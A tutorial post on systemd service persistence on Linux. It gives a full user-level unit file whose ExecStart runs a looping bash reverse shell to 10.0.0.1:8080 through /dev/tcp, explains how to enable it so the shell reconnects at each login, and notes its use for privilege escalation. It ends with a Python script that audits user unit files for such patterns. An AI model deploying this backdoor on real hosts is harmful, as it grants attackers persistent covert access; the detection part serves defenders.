Systemd Service

Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources. Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.

Systemd utilizes unit configuration files with the .service file extension to encode information about a service's process. By default, system-level unit files are stored in a systemd/system directory under the root-owned paths (/), and user-level unit files are stored in a systemd/user directory under the user-owned paths ($HOME).

These files therefore have two locations with two sets of permissions that can be abused: the user level and the administrator level. In this exercise I'll be working at the user level. Starting from a terminal with user-level access, the .service file needs to be placed in the .config folder of the current user's $HOME path, i.e. $HOME/.config/systemd/user/; the following screenshot shows the full path. If the folders do not exist, simply create the path.

The contents of the service file are as follows: a simple bash reverse shell that tries to connect back every 30 seconds.

[Unit]
Description=Persistence Service
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c 'while true; do bash -i >& /dev/tcp/10.0.0.1/8080 0>&1; sleep 30; done'
Restart=always
RestartSec=30

[Install]
WantedBy=default.target

Next, reload the user daemon so that it recognizes the new service.

After this, enable the service so that it runs at boot or login time.

Once the user logs back in, we will receive our reverse shell connection. This is also a useful method for privilege escalation to another user, so keep that in mind. A demo of this working:
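The same unit file is what a defender has to find. The Python audit script below is an added example and not part of the original post: it parses user-level unit files with a small parser (units are INI-like but may repeat keys such as ExecStart=), scans $HOME/.config/systemd/user/*.service, and reports ExecStart lines carrying the markers seen in the unit above, together with the Restart=always plus WantedBy=default.target combination that makes a unit re-run at every login. The indicator patterns are my own assumption, not a published rule set, and are a starting point for a host audit rather than a complete detection.

```python
import re
from pathlib import Path

# ExecStart patterns worth a human look; constructed for this example, not an exhaustive rule set.
SUSPICIOUS = [
    (re.compile(r"/dev/tcp/"), "bash network redirection via /dev/tcp"),
    (re.compile(r"\bbash\s+-i\b"), "interactive bash started by a unit"),
    (re.compile(r"\bwhile\s+true\b"), "infinite retry loop inside ExecStart"),
]

def parse_unit(text):
    """Parse unit text into {section: [(key, value), ...]}; duplicate keys are
    kept because systemd permits several ExecStart= lines in one unit."""
    units, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            units.setdefault(section, [])
        elif "=" in line and section is not None:
            key, _, value = line.partition("=")
            units[section].append((key.strip(), value.strip()))
    return units

def find_indicators(text):
    """Return human-readable findings for one unit file's contents."""
    unit = parse_unit(text)
    service = unit.get("Service", [])
    findings = []
    for key, value in service:
        if key.startswith("Exec"):  # ExecStart, ExecStartPre, ExecStop, ...
            for pattern, why in SUSPICIOUS:
                if pattern.search(value):
                    findings.append(f"{key}: {why}")
    restart = dict(service).get("Restart")
    wanted = dict(unit.get("Install", [])).get("WantedBy", "")
    if restart == "always" and "default.target" in wanted:
        findings.append("Restart=always unit pulled in by default.target (re-runs at every login)")
    return findings

def audit_user_units(home=None):
    """Scan <home>/.config/systemd/user/*.service; map each flagged path to its findings."""
    base = Path(home or Path.home()) / ".config" / "systemd" / "user"
    paths = sorted(base.glob("*.service")) if base.is_dir() else []
    return {str(p): hits for p in paths
            if (hits := find_indicators(p.read_text(errors="replace")))}
```

Run audit_user_units() for the current user, or pass each home directory under /home to cover every account on the host; the system-level directories deserve the same review with the root-owned paths substituted.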
